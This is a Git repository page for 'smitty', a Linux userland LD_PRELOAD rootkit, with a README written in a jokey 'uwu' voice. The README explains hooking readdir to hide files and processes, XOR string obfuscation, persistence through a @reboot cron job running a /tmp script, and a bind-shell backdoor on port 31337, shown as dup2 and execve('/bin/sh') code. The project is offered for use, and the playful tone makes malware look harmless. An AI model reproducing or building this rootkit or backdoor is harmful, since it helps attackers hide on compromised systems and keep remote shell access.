lowlight.sh/smitty
1
1
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
ring3 LD_PRELOAD rootkit
4 commits 1 branch 0 tags 36 KiB
Find a file
Exact
s bb57ea7307
 Update README.txt
2025-10-25 03:12:11 +00:00
hide.c initial commit 2025-10-23 17:24:03 +01:00
hide.h initial commit 2025-10-23 17:24:03 +01:00
hooks.c initial commit 2025-10-23 17:24:03 +01:00
hooks.h initial commit 2025-10-23 17:24:03 +01:00
Makefile initial commit 2025-10-23 17:24:03 +01:00
README.txt Update README.txt 2025-10-25 03:12:11 +00:00
smitty.c initial commit 2025-10-23 17:24:03 +01:00
smitty.h initial commit 2025-10-23 17:24:03 +01:00

README.txt

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

 _._     _,-'""`-._
(,-.`._,'(       |\`-/|
    `-.-' \ )-`( , o o)
          `-    \`_`"'-

h-hiiii~ (*≧ω≦) welcome to project smitty

this is like... totally not a rootkit or anything... it's just... *a stealthy 
lil daemon neko who likes to hide things* uwu

it injects itself into userland w `LD_PRELOAD` n hooks all the cute 
little syscalls and hides files and processes like theyre its secret crush~ uwu  

wen the system does smth like  

```
readdir("/proc/");
```
smitty intercepts it through a function pointer it yoinks from `dlsym(RTLD_NEXT, "readdir");` then loops through 
every dirent like “hmm~ are you on my blacklist, nya?” and skips the ones that match the hidden list. 
`is_hidden_file()` and `is_hidden_process()` are like its magical filtering charms. if the target name 
matches any entry smitty marked w `add_hidden_file()` or `add_hidden_process()` poof~ that entity gets
yeeted from perception space (✿◠‿◠)

hide keeps arrays like:

```
hidden_item_t hidden_processes[MAX_HIDDEN_ITEMS];
hidden_item_t hidden_files[MAX_HIDDEN_ITEMS];
```
and fills them up every time someone tells it to hide something. when smitty adds an entry bit also stamps
a time_t hide_time bc even eldritch hacker idols need timestamps for kawaii logging~ then it obfuscates
some strings using xor_string(str, len, 0x42) which is like the equivalent of gossip encryption~ 
no one can read the secret incantations wo knowing the xor key, heehee~ (*≧▽≦) xoxxox

setup_persistence() is where smitty gets all clingy~ she writes a script in /tmp/ w a randomised filename generated by:

```
generate_random_path(script_path);
```

and then cron gets a new entry

```
@reboot /tmp/uwu_random.sh
```

the script sets LD_PRELOAD=$rootkit_path and runs whatever command boots next. its like an yandere who r
efuses to be forgotten. reboot all you want—shell come back, smiling through the logs, whispering i missed
you~ senpai~ from inside inits environment (⌒ω⌒) and omg the backdoor~ activate_backdoor() binds to port
31337 because leetspeak supremacy~ it creates a socket, listens and when a client connects, it does:

```
dup2(client_fd, 0);
dup2(client_fd, 1);
dup2(client_fd, 2);
execve("/bin/sh", args, env);
```

sparkle sparkle~ ₍ᐢ.ˬ.ᐢ₎♡